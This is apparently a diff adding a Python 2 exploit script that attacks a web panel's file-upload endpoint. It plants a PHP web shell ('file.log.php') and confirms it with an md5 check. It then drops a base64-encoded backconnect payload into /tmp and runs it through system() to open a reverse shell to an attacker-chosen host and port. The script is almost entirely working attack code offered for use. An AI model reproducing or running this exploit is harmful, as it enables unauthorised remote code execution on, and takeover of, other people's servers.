| 1 | +#!/usr/bin/python2 |
| 2 | +# coding: utf-8 |
| 3 | +import requests |
| 4 | +import sys |
| 5 | +clear = "\x1b[0m" |
| 6 | +blue = "\x1b[1;34m" |
| 7 | +cyan = "\x1b[1;36m" |
| 8 | +red = "\x1b[1;31m" |
| 9 | +green = "\x1b[1;32m" |
| 10 | + |
| 11 | +def upload_shell(base_url): |
| 12 | + files={'upload1':('file.log.php', "<?php @assert(filter_input(0,woot,516)); ?>")} |
| 13 | + data={'slots': '1'} |
| 14 | + url = base_url + "/post.php" |
| 15 | + sys.stdout.write(cyan+"{*} Attempting shell upload..."+clear) |
| 16 | + sys.stdout.flush() |
| 17 | + try: |
| 18 | + requests.post(url=url, files=files, data=data) |
| 19 | + except Exception, e: |
| 20 | + sys.stdout.write(red+" [failed]\n"+clear) |
| 21 | + sys.stdout.flush() |
| 22 | + sys.exit("Stack Trace: \n%s" %(str(e))) |
| 23 | + try: |
| 24 | + output = execute_php(base_url=base_url, php="print md5('pwned');") |
| 25 | + except Exception, e: |
| 26 | + sys.stdout.write(red+" [failed]\n"+clear) |
| 27 | + sys.stdout.flush() |
| 28 | + sys.exit("Stack Trace: \n%s" %(str(e))) |
| 29 | + if "5e93de3efa544e85dcd6311732d28f95" in output: |
| 30 | + sys.stdout.write(green+" [success]\n"+clear) |
| 31 | + |
| 32 | +def upload_backconnect(base_url): |
| 33 | + sys.stdout.write(cyan+"{*} Uploading Backconnect..."+clear) |
| 34 | + encoded_shell = "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" |
| 35 | + cbdrop = """$hack = "%s";$x = fopen("/tmp/x", "w+");fwrite($x, base64_decode($hack));fclose($x);echo "dongs";""" %(encoded_shell) |
| 36 | + lol = execute_php(base_url, php=php_encoder(cbdrop)) |
| 37 | + if "dongs" in lol: |
| 38 | + sys.stdout.write(green+" [done]\n"+clear) |
| 39 | + |
| 40 | +def execute_php(base_url, php): |
| 41 | + shell_url = base_url + "/logs/dump/file.log.php" |
| 42 | + data={'woot': php} |
| 43 | + r = requests.post(url=shell_url, data=data) |
| 44 | + return r.text |
| 45 | + |
| 46 | +def php_encoder(php): |
| 47 | + encoded = php.encode('base64') |
| 48 | + encoded = encoded.replace("\n", "") |
| 49 | + encoded = encoded.strip() |
| 50 | + code = "eval(base64_decode('%s'));" %(encoded) |
| 51 | + return code |
| 52 | + |
| 53 | +def pop_reverse(base_url, cb_host, cb_port): |
| 54 | + upload_shell(base_url) |
| 55 | + upload_backconnect(base_url) |
| 56 | + print "%s{*} Sending backconnect to %s%s:%s%s" %(cyan, green, cb_host, cb_port, clear) |
| 57 | + execute_php(base_url, php="system('python /tmp/x %s %s');" %(cb_host, cb_port)) |
| 58 | + print "%s{$} bl1ngbl1ng!!%s" %(blue, clear) |
| 59 | + |
| 60 | +def main(args): |
| 61 | + if len(args) != 4: |
| 62 | + sys.exit("use: %s http://bot.net/Panel hacke.rs 31337" %(args[0])) |
| 63 | + pop_reverse(base_url=args[1], cb_host=args[2], cb_port=args[3]) |
| 64 | + |
| 65 | +if __name__ == "__main__": |
| 66 | + main(args=sys.argv) |